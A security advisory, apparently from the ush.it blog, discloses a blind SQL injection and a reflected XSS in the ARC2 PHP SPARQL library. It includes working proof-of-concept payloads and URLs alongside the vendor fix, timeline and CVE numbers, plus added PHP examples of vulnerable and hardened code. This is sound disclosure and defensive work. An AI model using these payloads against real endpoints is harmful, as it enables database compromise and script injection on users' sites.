ush.it - a beautiful place

ARC v2011-12-01 Multiple vulnerabilities

November 22, 2012 at 11:34 am - Filed under Hacks - 1408 words, reading time ~4 minutes

Simone "negator" Onofri and Luca "beinux3" Napolitano found multiple issues in ARC2, a library that provides RDF and SPARQL functionality to PHP applications and uses MySQL as its backend. The vulnerabilities found include SQL Injection and XSS.

 Name              ARC2 v2011-12-01 Multiple vulnerabilities
 Systems Affected  ARC2 v2011-12-01
 Severity          High
 Impact            High 10/10, vector (AV:N/AC:L/Au:N/C:C/I:C/A:C)
 Vendor            https://github.com/semsol/arc2
 Advisory          http://www.ush.it/team/negator/hack-arc_2011-12-01/adv.txt
 Author            Simone "negator" Onofri, Luca "beinux3" Napolitano
 Date              20121123

I. BACKGROUND

ARC is a flexible RDF system for semantic web and PHP practitioners. 
It's free, open-source, easy to use, and runs in most web server 
environments.

II. DESCRIPTION

ARC version v2011-12-01 and lower is affected by Blind SQL Injection and
Cross Site Scripting vulnerabilities, in particular in the SPARQL+
Endpoint.

III. ANALYSIS

Summary:
       A) Blind SQL Injection (SQLI) Vulnerability 
       B) Reflected Cross Site Scripting (XSS) Vulnerability

A) Blind SQL Injection (SQLI) Vulnerability

A blind SQL Injection vulnerability exists in ARC version v2011-12-01.

ARC stores triples in a MySQL database and translates SPARQL queries into
SQL. To ease debugging, the developer included SQL comments that contain
the query string values. It is possible to inject SQL commands through
these comments when the data is passed into a SPARQL WHERE clause.

In the "getTriplePatternSQL()" function of the
"ARC2_StoreSelectQueryHandler.php" file, the query sent to MySQL is
automatically annotated for debugging (with no option to disable this
feature) by inserting comments that contain the pattern's "S P O"
(Subject, Predicate, Object; the semantic web triple concept) values.

SPARQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

PREFIX iam: <http://x>
SELECT * WHERE {
   ?user iam:user "lol*/ OR (SELECT sleep(5))=1--" . 
}
LIMIT 100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

Actual MySQL Query:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

SELECT
  T_0_0_0.s AS `user`, 
    T_0_0_0.s_type AS `user type`
FROM arc_tests_triple T_0_0_0
WHERE (T_0_0_0.p = 0) /*FIX-IT http://xuser */
  AND (T_0_0_0.o = 0) /*FIX-IT lol*/ OR (SELECT sleep(5))=1-- */
LIMIT 0,100


--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
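The comment break-out shown in the query above, as an added example that is not ARC2's own code: a minimal stand-in for the debug comment, the same fragment with the terminator neutralised, and a reviewer check that tells the two apart. Function names are assumptions; the input literal is the one from the advisory's query.

```php
<?php
// Added example, not code from ARC2. The helper names are assumptions; the
// real getTriplePatternSQL() resolves term ids via hashes and does more.

// Vulnerable shape: the SPARQL literal is pasted verbatim into an SQL block
// comment. A value containing "*/" closes the comment early and everything
// after it is parsed as live SQL.
function debugCommentVulnerable(string $value): string
{
    return '/*FIX-IT ' . $value . ' */';
}

// Hardened shape: break every "*/" in the value so it can no longer close
// the comment ("* /" cannot recombine into "*/" in one pass). Dropping the
// debug comment, or making it opt-in for development, is the sturdier fix.
function debugCommentSafe(string $value): string
{
    return '/*FIX-IT ' . str_replace('*/', '* /', $value) . ' */';
}

// Builds the object-position WHERE fragment in the form the advisory's
// "Actual MySQL Query" shows (term id lookup simplified to the constant 0).
function objectCondition(string $alias, string $object, callable $comment): string
{
    return sprintf('(%s.o = 0) %s', $alias, $comment($object));
}

// Reviewer check: the fragment must be one equality test followed by one
// block comment with no inner "*/" (tempered dot stops at the terminator).
function commentIsIntact(string $sql): bool
{
    $pattern = '#^\(\w+\.o = 0\) /\*FIX-IT (?:(?!\*/).)* \*/$#s';
    return preg_match($pattern, $sql) === 1;
}

// Constructed input: the object literal from the advisory's PoC query.
$literal = 'lol*/ OR (SELECT sleep(5))=1--';

$vuln = objectCondition('T_0_0_0', $literal, 'debugCommentVulnerable');
$safe = objectCondition('T_0_0_0', $literal, 'debugCommentSafe');

echo $vuln, PHP_EOL;   // comment ends after "lol"; the rest is live SQL
echo $safe, PHP_EOL;   // terminator broken up; the comment stays closed
var_dump(commentIsIntact($vuln));
var_dump(commentIsIntact($safe));
```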

What follows is a demo exploitation of the SPARQL Endpoint.

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

<?php
// $store is an ARC2 store instance created earlier by the application.
$query = 'PREFIX iam: <http://x>
 SELECT * WHERE {
  ?user iam:user "lol*/ OR (SELECT sleep(5))=1--" . ?password iam:hasPassword "password" .
 } LIMIT 100';
$store->setUp();
$store->query($query, 'rows');

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

It's possible to exploit the issue in the standard blind way, for
example using TRUE/FALSE statements (tautology).

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end_point.php?query=PREFIX+iam%3A+<http%3A%2F%2Fx>%0D%0ASELECT+*+WHERE+%7B%0D%0A+++%3Fuser+iam%3Auser+"lol*%2F+OR+%28SELECT+sleep%285%29%29%3D1--".%0D%0A%7D%0D%0ALIMIT+1&output=&jsonp=&key=&show_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Blind SQL Injection is: High 10/10, vector 
(AV:N/AC:L/Au:N/C:C/I:C/A:C).

B) Reflected Cross Site Scripting (XSS) Vulnerability

A Reflected Cross Site Scripting vulnerability exists in the endpoint
function of ARC version v2011-12-01.

The GET variable "query" is reflected in the page without proper encoding
when the "output" option is set to "htmltab".

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

<div class="results">
 Could not properly handle "<script src=/lol.it/x><script>" in 
 ARC2_SPARQLPlusParser
</div>

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--
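The reflection shown above, as an added example that is not ARC2's own code: the error message rendered with raw concatenation beside the output-encoded form, plus a check for stray tags in the result. Function names are assumptions; the input is the markup from the advisory's output.

```php
<?php
// Added example, not code from ARC2. Function names are assumptions; the
// message text is the one the advisory shows inside the "results" div.

// Vulnerable shape: the raw "query" parameter is concatenated into HTML,
// so any markup it contains is rendered by the browser.
function renderParseErrorVulnerable(string $query): string
{
    return '<div class="results">Could not properly handle "' . $query
         . '" in ARC2_SPARQLPlusParser</div>';
}

// Hardened shape: encode for an HTML text context before concatenation.
// ENT_QUOTES also covers quoted attribute contexts; ENT_SUBSTITUTE keeps
// invalid UTF-8 from silently emptying the output.
function renderParseErrorSafe(string $query): string
{
    $enc = htmlspecialchars($query, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
    return '<div class="results">Could not properly handle "' . $enc
         . '" in ARC2_SPARQLPlusParser</div>';
}

// Reviewer check: after removing the expected wrapper div, no other tag
// may remain in the rendered fragment.
function containsUnexpectedTag(string $html): bool
{
    $rest = preg_replace('#</?div\b[^>]*>#i', '', $html);
    return preg_match('#<[a-z!/]#i', $rest) === 1;
}

// Constructed input: the markup from the advisory's reflected output.
$query = '<script src=/lol.it/x><script>';

echo renderParseErrorVulnerable($query), PHP_EOL;
echo renderParseErrorSafe($query), PHP_EOL;
var_dump(containsUnexpectedTag(renderParseErrorVulnerable($query)));
var_dump(containsUnexpectedTag(renderParseErrorSafe($query)));
```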

PoC URL that exploits this vulnerability:

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

http://www.example.com/end_point.php?query=<script+src%3D%2Flol.it%2Fx><script>&output=htmltab&jsonp=&key=&show_inline=1

--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--8<--

The CVSS v2 score for Reflected Cross Site Scripting is Medium 4.3/10, 
vector (AV:N/AC:M/Au:N/C:N/I:P/A:N).

IV. DETECTION

ARC2 v2011-12-01 and possibly earlier versions are vulnerable.

V. WORKAROUND

Update ARC2 to the latest release or manually fix the
"ARC2_StoreEndpoint.php" and other files as described by the commit ID
0a39922edaf6a72c5af60aaeaff7bc4e92a6d342.

https://github.com/semsol/arc2/commit/0a39922edaf6a72c5af60aaeaff7bc4e92a6d342

VI. VENDOR RESPONSE

Issues fixed in GIT commit 0a39922.
 
VII. CVE INFORMATION

The Common Vulnerabilities and Exposures (CVE) project has assigned:
 - The name CVE-2012-5872 to the Blind SQL Injection Vulnerability.
 - The name CVE-2012-5873 to the Reflected Cross Site Scripting
   Vulnerability.

This is a candidate for inclusion in the CVE list http://cve.mitre.org, 
which standardizes names for security problems.

VIII. DISCLOSURE TIMELINE

20121110 Bug discovered
20121110 Vendor contacted
20121111 Vendor responded
20121111 Vendor fixed SQLI
20121115 Vendor fixed XSS
20121115 Advisory release scheduled for 20121123
20121123 Advisory released

IX. REFERENCES

Well you know what SQLi and XSS are, right?

X. CREDIT

Simone "negator" Onofri is credited for the discovery of this
vulnerability.

Luca "beinux3" Napolitano is credited for the discovery of this
vulnerability.

Thanks to Francesco "ascii" Ongaro for revision and fine editing.

Simone "negator" Onofri
web site: http://simone.onofri.net/
mail: simone AT onofri DOT net

Luca "beinux3" Napolitano
web site: http://www.network-tsunami.com/
mail: beinux3 AT gmail DOT com

Francesco "ascii" Ongaro
web site: http://www.ush.it/
mail: ascii AT ush DOT it

XI. LEGAL NOTICES

Copyright (c) 2012 

Permission is granted for the redistribution of this alert
electronically. It may not be edited in any way without my express
written consent. If you wish to reprint the whole or any
part of this alert in any medium other than electronically,
please email me for permission.

Disclaimer: The information in the advisory is believed to be accurate 
at the time of publishing based on currently available information. Use 
of the information constitutes acceptance for use in an AS IS condition.
There are no warranties with regard to this information. Neither the
author nor the publisher accepts any liability for any direct, indirect,
or consequential loss or damage arising from use of, or reliance on, 
this information.